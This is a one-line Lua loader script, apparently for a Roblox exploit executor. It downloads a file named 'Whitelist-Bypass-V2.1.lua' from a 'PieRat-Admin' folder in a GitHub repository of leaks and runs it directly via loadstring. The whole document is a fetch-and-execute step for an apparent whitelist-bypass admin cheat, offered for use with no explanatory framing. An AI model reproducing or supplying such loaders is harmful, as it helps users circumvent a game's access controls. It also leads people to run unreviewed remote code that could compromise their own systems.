local request = (syn and syn.request) or (http and http.request) or http_request or nil if not request then request = function(tbl) return {Body = game:HttpGet(tbl.Url)} end end loadstring(request({Url = "https://raw.githubusercontent.com/jnz-dev/leaks_and_whatnot/main/PieRat-Admin/Whitelist-Bypass-V2.1.lua", Method = "GET"}).Body)()